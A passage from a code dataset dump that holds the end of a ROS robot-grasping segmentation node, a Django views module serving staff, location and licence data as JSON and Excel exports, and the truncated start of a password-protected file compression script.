for lbl in label],\n label_proba=score,\n )\n\n # sg, dg\n sg_cpi_msg = ClusterPointIndices(header=img_msg.header)\n sg_labels_msg = LabelArray(header=img_msg.header)\n sg_cls_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n sg_ins_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n dg_cpi_msg = ClusterPointIndices(header=img_msg.header)\n dg_labels_msg = LabelArray(header=img_msg.header)\n dg_cls_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n dg_ins_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n\n for ins_id, (cls_id, sg_lbl, dg_lbl) in enumerate(\n zip(label, sg_label, dg_label)):\n if cls_id not in self.candidates:\n continue\n class_name = self.label_names[cls_id]\n\n # sg\n if self.use_mask:\n sg_msk = np.logical_and(sg_lbl > 0, mask > 128)\n else:\n sg_msk = sg_lbl > 0\n sg_indices = 
np.where(sg_msk.flatten())[0]\n sg_indices_msg = PointIndices(\n header=img_msg.header, indices=sg_indices)\n sg_cpi_msg.cluster_indices.append(sg_indices_msg)\n sg_labels_msg.labels.append(\n Label(id=cls_id, name=class_name))\n sg_cls_lbl[sg_msk] = cls_id\n sg_ins_lbl[sg_msk] = ins_id\n\n # dg\n if self.use_mask:\n dg_msk = np.logical_and(dg_lbl > 0, mask > 128)\n else:\n dg_msk = dg_lbl > 0\n dg_indices = np.where(dg_msk.flatten())[0]\n dg_indices_msg = PointIndices(\n header=img_msg.header, indices=dg_indices)\n dg_cpi_msg.cluster_indices.append(dg_indices_msg)\n dg_labels_msg.labels.append(\n Label(id=cls_id, name=class_name))\n dg_cls_lbl[dg_msk] = cls_id\n dg_ins_lbl[dg_msk] = ins_id\n\n sg_cls_lbl_msg = bridge.cv2_to_imgmsg(sg_cls_lbl)\n sg_cls_lbl_msg.header = img_msg.header\n sg_ins_lbl_msg = bridge.cv2_to_imgmsg(sg_ins_lbl)\n sg_ins_lbl_msg.header = img_msg.header\n dg_cls_lbl_msg = bridge.cv2_to_imgmsg(dg_cls_lbl)\n dg_cls_lbl_msg.header = img_msg.header\n dg_ins_lbl_msg = bridge.cv2_to_imgmsg(dg_ins_lbl)\n dg_ins_lbl_msg.header = img_msg.header\n\n sg_ins_prob_img = ins_prob[:, 1, :, :] * \\\n np.sum(sg_prob[:, 1:, :, :], axis=1)\n if self.use_mask:\n sg_ins_prob_mask = np.repeat(\n (mask <= 128)[None], len(sg_ins_prob_img), axis=0)\n sg_ins_prob_img[sg_ins_prob_mask] = 0\n sg_ins_prob = np.max(sg_ins_prob_img, axis=(1, 2))\n assert len(sg_ins_prob) == len(sg_prob)\n assert sg_ins_prob.ndim == 1\n\n dg_ins_prob_img = ins_prob[:, 1, :, :] * \\\n np.sum(dg_prob[:, 1:, :, :], axis=1)\n if self.use_mask:\n dg_ins_prob_mask = np.repeat(\n (mask <= 128)[None], len(dg_ins_prob_img), axis=0)\n dg_ins_prob_img[dg_ins_prob_mask] = 0\n dg_ins_prob = np.max(dg_ins_prob_img, axis=(1, 2))\n assert len(dg_ins_prob) == len(dg_prob)\n assert dg_ins_prob.ndim == 1\n\n # grasp mask and style\n if self.sampling:\n if len(self.candidates) != 2:\n rospy.logerr('Invalid tote contents num: {}'.format(\n self.candidates))\n grasp_style = self.grasping_way\n if self.candidates[1] in label:\n grasp_cls_ids = [self.candidates[1]]\n if grasp_style == 'single':\n grasp_probs = sg_ins_prob[label == grasp_cls_ids[0]][0:1]\n grasp_mask = self._random_sample_sg_mask(\n sg_cls_lbl == grasp_cls_ids[0],\n vis_cls_lbl == grasp_cls_ids[0])\n else:\n grasp_probs = dg_ins_prob[label == grasp_cls_ids[0]][0:1]\n grasp_mask = self._random_sample_dg_mask(\n dg_cls_lbl == grasp_cls_ids[0],\n vis_cls_lbl == grasp_cls_ids[0])\n else:\n grasp_cls_ids = []\n grasp_probs = []\n grasp_mask = np.zeros(img.shape[1:], dtype=np.uint8)\n is_target = True\n else:\n sg_ins_prob[sg_ins_prob <= self.grasp_thresh] = 0\n dg_ins_prob[dg_ins_prob <= self.grasp_thresh] = 0\n vis_ratio = vis_ins_n_pixel / (vis_ins_n_pixel + occ_ins_n_pixel)\n vis_ratio[np.isnan(vis_ratio)] = 0\n target_ins_ids = []\n if self.target_grasp:\n for ins_id in range(len(vis_ratio)):\n if (label[ins_id] in self.target_ids and\n (sg_ins_prob[ins_id] > 0 or\n dg_ins_prob[ins_id] > 0)):\n target_ins_ids.append(ins_id)\n target_ins_ids = np.array(target_ins_ids, dtype=np.int32)\n\n if self.target_grasp and len(target_ins_ids) > 0:\n target_sg_ins_prob = sg_ins_prob[target_ins_ids]\n target_dg_ins_prob = dg_ins_prob[target_ins_ids]\n\n sg_ins_prob_max = target_sg_ins_prob.max()\n dg_ins_prob_max = target_dg_ins_prob.max()\n sg_ins_id = target_ins_ids[target_sg_ins_prob.argmax()]\n dg_ins_id = target_ins_ids[target_dg_ins_prob.argmax()]\n\n # either of sg, dg are graspable\n if vis_ratio[sg_ins_id] > self.vis_thresh \\\n or vis_ratio[dg_ins_id] > self.vis_thresh:\n # both 
of sg, dg are graspable\n                    if vis_ratio[sg_ins_id] > self.vis_thresh \\\n                            and vis_ratio[dg_ins_id] > self.vis_thresh:\n                        if sg_ins_prob_max > dg_ins_prob_max:\n                            grasp_style = 'single'\n                        else:\n                            grasp_style = 'dual'\n                    # sg is graspable, but dg is not\n                    elif vis_ratio[sg_ins_id] > self.vis_thresh:\n                        grasp_style = 'single'\n                    # dg is graspable, but sg is not\n                    else:\n                        grasp_style = 'dual'\n\n                    if grasp_style == 'single':\n                        grasp_ins_ids = [sg_ins_id]\n                        grasp_probs = [sg_ins_prob_max]\n                        grasp_mask = \\\n                            sg_ins_prob_img[sg_ins_id] > self.grasp_thresh\n                    else:\n                        grasp_ins_ids = [dg_ins_id]\n                        grasp_probs = [dg_ins_prob_max]\n                        grasp_mask = \\\n                            dg_ins_prob_img[dg_ins_id] > self.grasp_thresh\n                # none of sg, dg are graspable\n                else:\n                    if sg_ins_prob_max > dg_ins_prob_max:\n                        occ_ins_id = self._find_occ_top(\n                            sg_ins_id, ins_label, label)\n                    else:\n                        occ_ins_id = self._find_occ_top(\n                            dg_ins_id, ins_label, label)\n\n                    if sg_ins_prob[occ_ins_id] > dg_ins_prob[occ_ins_id]:\n                        grasp_style = 'single'\n                        grasp_ins_ids = [occ_ins_id]\n                        grasp_probs = [sg_ins_prob[occ_ins_id]]\n                        grasp_mask = \\\n                            sg_ins_prob_img[occ_ins_id] > self.grasp_thresh\n                    else:\n                        grasp_style = 'dual'\n                        grasp_ins_ids = [occ_ins_id]\n                        grasp_probs = [dg_ins_prob[occ_ins_id]]\n                        grasp_mask = \\\n                            dg_ins_prob_img[occ_ins_id] > self.grasp_thresh\n            else:\n                sg_ins_prob[vis_ratio <= self.vis_thresh] = 0\n                dg_ins_prob[vis_ratio <= self.vis_thresh] = 0\n                is_candidates = np.array(\n                    [lbl in self.candidates for lbl in label], dtype=np.bool)\n                sg_ins_prob[~is_candidates] = 0\n                dg_ins_prob[~is_candidates] = 0\n                sg_ins_prob_max = sg_ins_prob.max()\n                dg_ins_prob_max = dg_ins_prob.max()\n\n                if sg_ins_prob_max > dg_ins_prob_max:\n                    grasp_style = 'single'\n                    grasp_ins_ids = [np.argmax(sg_ins_prob)]\n                    grasp_probs = [sg_ins_prob_max]\n                    if label[grasp_ins_ids[0]] in self.candidates:\n                        grasp_mask = sg_ins_prob_img[\n                            grasp_ins_ids[0]] > self.grasp_thresh\n                    else:\n                        grasp_mask = np.zeros(img.shape[1:], dtype=np.uint8)\n                else:\n                    grasp_style = 'dual'\n                    grasp_ins_ids = [np.argmax(dg_ins_prob)]\n                    grasp_probs = [dg_ins_prob_max]\n                    if label[grasp_ins_ids[0]] in self.candidates:\n                        grasp_mask = dg_ins_prob_img[\n                            grasp_ins_ids[0]] > self.grasp_thresh\n                    else:\n                        grasp_mask = np.zeros(img.shape[1:], dtype=np.uint8)\n\n        grasp_mask = grasp_mask.astype(np.uint8) * 255\n        grasp_cls_ids = [\n            label[grasp_ins_id] for grasp_ins_id in grasp_ins_ids]\n        if self.target_grasp:\n            is_target = grasp_cls_ids[0] in self.target_ids\n        else:\n            is_target = True\n\n        grasp_mask_msg = bridge.cv2_to_imgmsg(grasp_mask, encoding='mono8')\n        grasp_mask_msg.header = img_msg.header\n\n        grasp_label_names = []\n        for grasp_cls_id in grasp_cls_ids:\n            if grasp_cls_id >= 0:\n                grasp_label_names.append(self.label_names[grasp_cls_id])\n            else:\n                grasp_label_names.append('__background__')\n\n        grasp_cls_msg = GraspClassificationResult(\n            header=img_msg.header,\n            style=grasp_style,\n            is_target=is_target,\n            classification=ClassificationResult(\n                header=img_msg.header,\n                labels=grasp_cls_ids,\n                label_names=grasp_label_names,\n                label_proba=grasp_probs,\n                classifier='OccludedGraspMaskRCNNResNet101',\n                target_names=self.label_names))\n\n        # publish\n        # input\n        self.pub_net_input.publish(net_input_msg)\n        self.pub_vis_output.publish(vis_output_msg)\n\n        # vis\n        self.pub_vis_cpi.publish(vis_cpi_msg)\n        self.pub_vis_labels.publish(vis_labels_msg)\n        self.pub_vis_cls_lbl.publish(vis_cls_lbl_msg)\n        self.pub_vis_ins_lbl.publish(vis_ins_lbl_msg)\n\n        # occ\n        self.pub_occ_cpi.publish(occ_cpi_msg)\n        self.pub_occ_labels.publish(occ_labels_msg)\n        
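# --- Illustrative aside (not part of the original node) ---
# A toy sketch of the selection rule implemented above: per-instance grasp
# probabilities are reduced with max(), instances below the grasp threshold or
# with too little visible area are zeroed out, and the higher-scoring grasp
# style wins. All numbers below are invented for illustration only.
import numpy as np

sg_p = np.array([0.9, 0.2, 0.6])   # single-arm grasp confidence per instance
dg_p = np.array([0.1, 0.8, 0.3])   # dual-arm grasp confidence per instance
vis = np.array([0.8, 0.9, 0.1])    # visible fraction of each instance
grasp_thresh, vis_thresh = 0.5, 0.5

sg = np.where((sg_p > grasp_thresh) & (vis > vis_thresh), sg_p, 0.0)
dg = np.where((dg_p > grasp_thresh) & (vis > vis_thresh), dg_p, 0.0)
style = 'single' if sg.max() > dg.max() else 'dual'
chosen = int(np.argmax(sg if style == 'single' else dg))
print(style, chosen)  # -> single 0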
self.pub_occ_cls_lbl.publish(occ_cls_lbl_msg)\n self.pub_occ_ins_lbl.publish(occ_ins_lbl_msg)\n\n # bbox\n self.pub_rects.publish(rects_msg)\n\n # class\n self.pub_class.publish(cls_msg)\n\n # sg\n self.pub_sg_cpi.publish(sg_cpi_msg)\n self.pub_sg_labels.publish(sg_labels_msg)\n self.pub_sg_cls_lbl.publish(sg_cls_lbl_msg)\n self.pub_sg_ins_lbl.publish(sg_ins_lbl_msg)\n\n # dg\n self.pub_dg_cpi.publish(dg_cpi_msg)\n self.pub_dg_labels.publish(dg_labels_msg)\n self.pub_dg_cls_lbl.publish(dg_cls_lbl_msg)\n self.pub_dg_ins_lbl.publish(dg_ins_lbl_msg)\n\n self.pub_grasp_mask.publish(grasp_mask_msg)\n self.pub_grasp_class.publish(grasp_cls_msg)\n # time.sleep(1.0)\n\n def _random_sample_sg_mask(self, sg_prb, label_msk):\n weight = sg_prb\n weight[~label_msk] = 0.0\n if self.sampling_weighted and np.sum(weight) > 0:\n weight = weight.ravel() / np.sum(weight)\n elif np.sum(label_msk) > 0:\n label_msk = label_msk.astype(np.float32)\n weight = label_msk.ravel() / np.sum(label_msk)\n else:\n weight = None\n sample_grasp = np.zeros(sg_prb.shape)\n sampled_i = np.random.choice(sg_prb.size, p=weight)\n sampled_index = (\n sampled_i // sg_prb.shape[1],\n sampled_i % sg_prb.shape[1],\n )\n sample_grasp[sampled_index] = 255\n sample_grasp = scipy.ndimage.filters.gaussian_filter(\n sample_grasp, sigma=20)\n sample_grasp = sample_grasp / sample_grasp.max()\n sample_mask = sample_grasp > self.sampling_thresh\n sample_mask = sample_mask.astype(np.uint8) * 255\n return sample_mask\n\n def _random_sample_dg_mask(self, dg_prb, label_msk):\n indices = np.column_stack(np.where(label_msk))\n\n c_masks = []\n if indices.size > 1:\n kmeans = KMeans(n_clusters=2)\n try:\n kmeans.fit(indices)\n centers = kmeans.cluster_centers_\n labels = kmeans.labels_\n for label, center in enumerate(centers):\n center = np.round(center).astype(np.int32)\n c_mask = np.zeros(label_msk.shape).astype(bool)\n masked_indices = indices[labels == label]\n masked_indices = (\n masked_indices[:, 0], masked_indices[:, 1])\n c_mask[masked_indices] = True\n weight = dg_prb.copy()\n weight[~c_mask] = 0.0\n if self.sampling_weighted and np.sum(weight) > 0:\n weight = weight.ravel() / np.sum(weight)\n elif np.sum(label_msk) > 0:\n label_msk = label_msk.astype(np.float32)\n weight = label_msk.ravel() / np.sum(label_msk)\n else:\n weight = None\n dual_giveup = False\n trial_num = 10\n for i in range(0, trial_num):\n sampled_i = np.random.choice(dg_prb.size, p=weight)\n sampled_index = (\n sampled_i // dg_prb.shape[1],\n sampled_i % dg_prb.shape[1],\n )\n c_grasp = np.zeros(dg_prb.shape)\n c_grasp[sampled_index] = 255\n c_grasp = scipy.ndimage.filters.gaussian_filter(\n c_grasp, sigma=20)\n c_grasp = c_grasp / c_grasp.max()\n c_mask = c_grasp > self.sampling_thresh\n if len(c_masks) > 0:\n if not np.any(np.logical_and(c_mask, c_masks[0])):\n c_masks.append(c_mask)\n break\n else:\n c_masks.append(c_mask)\n break\n if i == trial_num - 1:\n dual_giveup = True\n except Exception:\n dual_giveup = True\n if len(c_masks) == 2 and dual_giveup is False:\n sample_mask = np.logical_or(c_masks[0], c_masks[1])\n sample_mask = sample_mask.astype(np.uint8) * 255\n else:\n sample_mask = np.zeros(dg_prb.shape, dtype=np.uint8)\n\n return sample_mask\n\n def _find_occ_top(self, target_ins_id, ins_label, label):\n checked_ids = set()\n checked_ids.add(target_ins_id)\n vis_msk = ins_label[target_ins_id] == 1\n vis_rto = vis_msk.sum() / (ins_label[target_ins_id] > 0).sum()\n if vis_rto > self.vis_thresh:\n rospy.loginfo(\n '{}_{} is not occluded but graspable!'\n 
.format(self.label_names[label[target_ins_id]], target_ins_id))\n return target_ins_id\n ret_ins_id = None\n for ins_id, ins_lbl in enumerate(ins_label):\n if ins_id in checked_ids:\n continue\n else:\n occ_msk = ins_label[target_ins_id] == 2\n occ_msk_by_this = np.logical_and(ins_lbl == 1, occ_msk)\n occ_rto = occ_msk_by_this.sum() / occ_msk.sum()\n if occ_rto > 0.1:\n rospy.loginfo(\n '{}_{} is occluded by {}_{}'\n .format(self.label_names[label[target_ins_id]],\n target_ins_id,\n self.label_names[label[ins_id]], ins_id))\n ret_ins_id = self._find_occ_top_step(\n ins_id, ins_label, label, checked_ids)\n if ret_ins_id is not None:\n break\n if ret_ins_id is None:\n return target_ins_id\n else:\n return ret_ins_id\n\n def _find_occ_top_step(self, target_ins_id, ins_label, label, checked_ids):\n checked_ids.add(target_ins_id)\n vis_msk = ins_label[target_ins_id] == 1\n vis_rto = vis_msk.sum() / (ins_label[target_ins_id] > 0).sum()\n if vis_rto > self.vis_thresh:\n rospy.loginfo(\n '{}_{} is not occluded but graspable!'\n .format(self.label_names[label[target_ins_id]], target_ins_id))\n return target_ins_id\n ret_ins_id = None\n for ins_id, ins_lbl in enumerate(ins_label):\n if ins_id in checked_ids:\n continue\n else:\n occ_msk = ins_label[target_ins_id] == 2\n occ_msk_by_this = np.logical_and(ins_lbl == 1, occ_msk)\n occ_rto = occ_msk_by_this.sum() / occ_msk.sum()\n if occ_rto > 0.1:\n rospy.loginfo(\n '{}_{} is occluded by {}_{}'\n .format(self.label_names[label[target_ins_id]],\n target_ins_id,\n self.label_names[label[ins_id]], ins_id))\n ret_ins_id = self._find_occ_top_step(\n ins_id, ins_label, label, checked_ids)\n if ret_ins_id is not None:\n break\n return ret_ins_id\n\n def _get_another(self, req):\n grasp_style = req.style\n label = req.label\n self.giveup_ins_ids[grasp_style].append(label)\n response = GetAnotherResponse()\n response.success = True\n return response\n\n def _reset(self, req):\n self.giveup_ins_ids = {\n 'single': [],\n 'dual': [],\n }\n response = TriggerResponse()\n response.success = True\n return response\n\n def _dyn_callback(self, config, level):\n self.score_thresh = config.score_thresh\n self.grasp_thresh = config.grasp_thresh\n self.nms_thresh = config.nms_thresh\n self.vis_thresh = config.vis_thresh\n self.sampling_thresh = config.sampling_thresh\n self.grasping_way = config.grasping_way\n return config\n\n\nif __name__ == '__main__':\n rospy.init_node('dualarm_occluded_grasp_instance_segmentation')\n node = DualarmOccludedGraspInstanceSegmentation()\n rospy.spin()\n","sub_path":"demos/selective_dualarm_grasping/node_scripts/dualarm_occluded_grasp_instance_segmentation.py","file_name":"dualarm_occluded_grasp_instance_segmentation.py","file_ext":"py","file_size_in_byte":32542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"173638792","text":"from basicauth.decorators import basic_auth_required\nfrom datetime import date, datetime\nfrom django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import Group\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, JsonResponse\nfrom django.db.models import Q\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import View, ListView, DetailView, UpdateView, FormView, TemplateView\nfrom itassets.utils import breadcrumbs_list\n\nfrom .forms import 
ConfirmPhoneNosForm\nfrom .models import DepartmentUser, Location, OrgUnit, ADAction\nfrom .reports import department_user_export, user_account_export, department_user_ascender_discrepancies\n\n\nclass AddressBook(TemplateView):\n template_name = 'organisation/address_book.html'\n\n\n@method_decorator(basic_auth_required(target_test=lambda request: not request.user.is_authenticated), name='dispatch')\nclass DepartmentUserAPIResource(View):\n \"\"\"An API view that returns JSON of active department staff accounts.\n \"\"\"\n def get(self, request, *args, **kwargs):\n queryset = DepartmentUser.objects.filter(\n **DepartmentUser.ACTIVE_FILTER\n ).exclude(\n account_type__in=DepartmentUser.ACCOUNT_TYPE_EXCLUDE\n ).prefetch_related(\n 'location',\n 'org_unit',\n ).order_by('name')\n\n if 'q' in self.request.GET: # Allow basic filtering on email.\n queryset = queryset.filter(email__icontains=self.request.GET['q'])\n\n if 'selectlist' in request.GET: # Smaller response, for use in HTML select lists.\n users = {'objects': [{'id': user.pk, 'text': user.email} for user in queryset]}\n else: # Normal API response.\n users = [\n {\n 'id': user.pk,\n 'name': user.name,\n 'preferred_name': user.preferred_name if user.preferred_name else None,\n 'email': user.email,\n 'title': user.title if user.title else None,\n 'telephone': user.telephone if user.telephone else None,\n 'extension': user.extension if user.extension else None,\n 'mobile_phone': user.mobile_phone if user.mobile_phone else None,\n 'location': {'id': user.location.pk, 'name': user.location.name} if user.location else {},\n 'org_unit': {'id': user.org_unit.pk, 'name': user.org_unit.name, 'acronym': user.org_unit.acronym} if user.org_unit else {},\n 'group_unit': {'id': user.group_unit.pk, 'name': user.group_unit.name, 'acronym': user.group_unit.acronym} if user.group_unit else {},\n 'cost_centre': user.cost_centre.code if user.cost_centre else None,\n 'employee_id': user.employee_id if user.employee_id else None, # NOTE: employee ID is used in the Moodle employee sync process.\n } for user in queryset\n ]\n\n return JsonResponse(users, safe=False)\n\n\n@method_decorator(basic_auth_required(target_test=lambda request: not request.user.is_authenticated), name='dispatch')\nclass LocationAPIResource(View):\n \"\"\"An API view that returns JSON of active physical locations.\n \"\"\"\n def get(self, request, *args, **kwargs):\n queryset = Location.objects.filter(active=True).order_by('name')\n\n if 'q' in self.request.GET: # Allow basic filtering on name.\n queryset = queryset.filter(name__icontains=self.request.GET['q'])\n\n if 'selectlist' in request.GET: # Smaller response, for use in HTML select lists.\n locations = {'objects': [{'id': location.pk, 'text': location.name} for location in queryset]}\n else:\n locations = [\n {\n 'id': location.pk,\n 'name': location.name,\n 'point': {'type': 'Point', 'coordinates': location.point.coords} if location.point else {},\n 'address': location.address,\n 'pobox': location.pobox,\n 'phone': location.phone,\n 'fax': location.fax,\n } for location in queryset\n ]\n\n return JsonResponse(locations, safe=False)\n\n\n@method_decorator(basic_auth_required(target_test=lambda request: not request.user.is_authenticated), name='dispatch')\nclass OrgUnitAPIResource(View):\n \"\"\"An API view that returns JSON of active organisation units.\n \"\"\"\n def get(self, request, *args, **kwargs):\n queryset = OrgUnit.objects.filter(active=True).order_by('name')\n\n if 'q' in self.request.GET: # Allow basic filtering on 
name.\n queryset = queryset.filter(name__icontains=self.request.GET['q'])\n if 'division' in self.request.GET: # Allow filtering to divisions only.\n queryset = queryset.filter(unit_type=1)\n if 'division_id' in self.request.GET and self.request.GET['division_id']: # Allow filtering to org units belonging to a division.\n queryset = queryset.filter(division_unit__pk=self.request.GET['division_id'])\n\n if 'selectlist' in request.GET: # Smaller response, for use in HTML select lists.\n org_units = {'objects': [{'id': ou.pk, 'text': ou.name} for ou in queryset]}\n else:\n org_units = [\n {\n 'id': ou.pk,\n 'name': ou.name,\n 'division_id': ou.division_unit.pk if ou.division_unit else None,\n } for ou in queryset\n ]\n\n return JsonResponse(org_units, safe=False)\n\n\n@method_decorator(basic_auth_required(target_test=lambda request: not request.user.is_authenticated), name='dispatch')\nclass LicenseAPIResource(View):\n \"\"\"An API view that returns a list of Microsoft-licensed accounts.\n \"\"\"\n\n def get(self, request, *args, **kwargs):\n # Return active users having an E5 or E1 licence assigned.\n queryset = DepartmentUser.objects.filter(\n active=True,\n ).filter(\n Q(assigned_licences__contains=['MICROSOFT 365 E5']) |\n Q(assigned_licences__contains=['OFFICE 365 E5']) |\n Q(assigned_licences__contains=['OFFICE 365 E1'])\n ).order_by('name')\n\n if 'q' in self.request.GET: # Allow basic filtering on email.\n queryset = queryset.filter(email__icontains=self.request.GET['q'])\n\n licenses = [\n {\n 'name': user.name,\n 'email': user.email,\n 'cost_centre': user.cost_centre.code if user.cost_centre else None,\n 'microsoft_365_licence': user.get_office_licence(),\n 'active': user.active,\n 'shared': user.shared_account,\n } for user in queryset\n ]\n\n return JsonResponse(licenses, safe=False)\n\n\nclass DepartmentUserExport(View):\n \"\"\"A custom view to export details of active Department users to an Excel spreadsheet.\n \"\"\"\n def get(self, request, *args, **kwargs):\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=department_users_{}_{}.xlsx'.format(date.today().isoformat(), datetime.now().strftime('%H%M'))\n\n if 'all' in request.GET: # Return all objects.\n users = DepartmentUser.objects.all()\n else: # Default to active users only.\n users = DepartmentUser.objects.filter(**DepartmentUser.ACTIVE_FILTER).exclude(account_type__in=DepartmentUser.ACCOUNT_TYPE_EXCLUDE)\n\n response = department_user_export(response, users)\n return response\n\n\nclass UserAccountExport(View):\n \"\"\"A custom view to return a subset of \"active\" DepartmentUser data to an Excel spreadsheet.\n \"\"\"\n def get(self, request, *args, **kwargs):\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = 'attachment; filename=user_accounts_{}_{}.xlsx'.format(date.today().isoformat(), datetime.now().strftime('%H%M'))\n\n # TODO: filtering via request params.\n users = DepartmentUser.objects.filter(active=True).order_by('username')\n response = user_account_export(response, users)\n return response\n\n\nclass AscenderDiscrepanciesExport(LoginRequiredMixin, View):\n\n def get(self, request, *args, **kwargs):\n if not request.user.is_superuser:\n return HttpResponseForbidden('Unauthorised')\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n 
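# --- Illustrative aside (not part of the original module) ---
# Every API resource in this module follows the same shape: build a queryset,
# optionally narrow it from GET parameters, serialise it to a list of plain
# dicts, and return JsonResponse(..., safe=False) because the top-level JSON
# value is a list rather than a dict. A hedged, minimal sketch of that
# pattern; the app and model names below are hypothetical.
from django.http import JsonResponse
from django.views.generic import View

from myapp.models import ExampleModel  # hypothetical model, for illustration


class ExampleAPIResource(View):
    """Tiny JSON list endpoint in the style of the resources above."""

    def get(self, request, *args, **kwargs):
        queryset = ExampleModel.objects.filter(active=True).order_by('name')
        if 'q' in request.GET:  # optional substring filter, as above
            queryset = queryset.filter(name__icontains=request.GET['q'])
        items = [{'id': obj.pk, 'name': obj.name} for obj in queryset]
        return JsonResponse(items, safe=False)  # safe=False permits a list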
response['Content-Disposition'] = 'attachment; filename=ascender_discrepancies_{}_{}.xlsx'.format(date.today().isoformat(), datetime.now().strftime('%H%M'))\n        users = DepartmentUser.objects.filter(**DepartmentUser.ACTIVE_FILTER).exclude(shared_account=True).order_by('username')\n        response = department_user_ascender_discrepancies(response, users)\n        return response\n\n\nclass ADActionList(LoginRequiredMixin, ListView):\n    model = ADAction\n\n    def get_queryset(self):\n        qs = super().get_queryset()\n        return qs.filter(completed__isnull=True).order_by('created')\n\n    def dispatch(self, request, *args, **kwargs):\n        if not (request.user.is_superuser or (request.user.is_staff and Group.objects.get(name='OIM Staff') in request.user.groups.all())):\n            return HttpResponseForbidden('Unauthorised')\n        return super().dispatch(request, *args, **kwargs)\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['site_title'] = 'DBCA Office of Information Management'\n        context['site_acronym'] = 'OIM'\n        context['page_title'] = 'Active Directory actions'\n        # Breadcrumb links:\n        links = [(None, 'AD actions')]\n        context[\"breadcrumb_trail\"] = breadcrumbs_list(links)\n        return context\n\n\nclass ADActionDetail(LoginRequiredMixin, DetailView):\n    model = ADAction\n\n    def dispatch(self, request, *args, **kwargs):\n        if not (request.user.is_superuser or (request.user.is_staff and Group.objects.get(name='OIM Staff') in request.user.groups.all())):\n            return HttpResponseForbidden('Unauthorised')\n        return super().dispatch(request, *args, **kwargs)\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        obj = self.get_object()\n        context['site_title'] = 'DBCA Office of Information Management'\n        context['site_acronym'] = 'OIM'\n        context['page_title'] = 'Active Directory action {}'.format(obj.pk)\n        # Breadcrumb links:\n        links = [(reverse(\"ad_action_list\"), \"AD actions\"), (None, obj.pk)]\n        context[\"breadcrumb_trail\"] = breadcrumbs_list(links)\n        return context\n\n\nclass ADActionComplete(LoginRequiredMixin, UpdateView):\n    model = ADAction\n\n    def dispatch(self, request, *args, **kwargs):\n        if not (request.user.is_superuser or (request.user.is_staff and Group.objects.get(name='OIM Staff') in request.user.groups.all())):\n            return HttpResponseForbidden('Unauthorised')\n        return super().dispatch(request, *args, **kwargs)\n\n    def get(self, request, *args, **kwargs):\n        # We should already have checked permissions in dispatch, so 'complete' the ADAction.\n        action = self.get_object()\n        action.completed = timezone.localtime()\n        action.completed_by = request.user\n        action.save()\n        messages.success(request, \"Action {} has been marked as completed\".format(action.pk))\n        return HttpResponseRedirect(reverse(\"ad_action_list\"))\n\n\nclass ConfirmPhoneNos(LoginRequiredMixin, FormView):\n    model = DepartmentUser\n    form_class = ConfirmPhoneNosForm\n    template_name = 'organisation/confirm_phone_nos.html'\n\n    def get_department_user(self):\n        if DepartmentUser.objects.filter(email__iexact=self.request.user.email).exists():\n            return DepartmentUser.objects.get(email__iexact=self.request.user.email)\n        return None\n\n    def get_success_url(self):\n        return reverse('confirm_phone_nos')\n\n    def dispatch(self, request, *args, **kwargs):\n        user = self.get_department_user()\n        # Business rule: you can only open this view if there's a matching DepartmentUser object to your logged-in User.\n        if not user:\n            return HttpResponseForbidden('Unauthorised')\n        return 
super().dispatch(request, *args, **kwargs)\n\n    def get_form_kwargs(self):\n        kwargs = super().get_form_kwargs()\n        options = {'work_telephone': [], 'work_mobile_phone': []}\n        user = self.get_department_user()\n        if user.telephone:\n            options['work_telephone'].append((user.telephone, user.telephone))\n        if user.ascender_data and 'work_phone_no' in user.ascender_data and user.ascender_data['work_phone_no'] and user.ascender_data['work_phone_no'] != user.telephone:\n            options['work_telephone'].append((user.ascender_data['work_phone_no'], user.ascender_data['work_phone_no']))\n        options['work_telephone'].append(('NA', 'Not applicable (no work telephone in use)'))\n        if user.mobile_phone:\n            options['work_mobile_phone'].append((user.mobile_phone, user.mobile_phone))\n        if user.ascender_data and 'work_mobile_phone_no' in user.ascender_data and user.ascender_data['work_mobile_phone_no'] and user.ascender_data['work_mobile_phone_no'] != user.mobile_phone:\n            options['work_mobile_phone'].append((user.ascender_data['work_mobile_phone_no'], user.ascender_data['work_mobile_phone_no']))\n        options['work_mobile_phone'].append(('NA', 'Not applicable (no work mobile phone in use)'))\n        kwargs['options'] = options\n        return kwargs\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        context['site_title'] = 'DBCA Office of Information Management'\n        context['site_acronym'] = 'OIM'\n        context['page_title'] = '{} - DBCA telephone numbers'.format(self.request.user.get_full_name())\n        user = self.get_department_user()\n        if user.ascender_data and 'audit_confirm_phone_nos' in user.ascender_data:\n            context['completed_form'] = True\n        else:\n            context['completed_form'] = False\n        return context\n\n    def form_valid(self, form):\n        user = self.get_department_user()\n        user.ascender_data['audit_confirm_phone_nos'] = form.cleaned_data\n        user.ascender_data['audit_confirm_phone_nos']['user_submitted'] = datetime.utcnow().isoformat()\n        user.save()\n        messages.success(self.request, 'Your response has been saved.')\n        return super().form_valid(form)\n","sub_path":"organisation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"65976827","text":"# -*- coding: utf-8 -*-\nimport subprocess, traceback, os\nversion = '1.0'\nfile_pw = ''  # password (loaded from pw_file)\npw_file = '密码写在这里面.txt'\ninput_path = '需要压缩的文件放这里'\noutput_path = '压缩完成的文件在这里'\n\n\ndef get_pw():\n    global file_pw\n    with open(pw_file, 'r', encoding='utf-8') as f:\n        file_pw = f.read().strip()\n    \n\ndef get_files():\n    dirs = 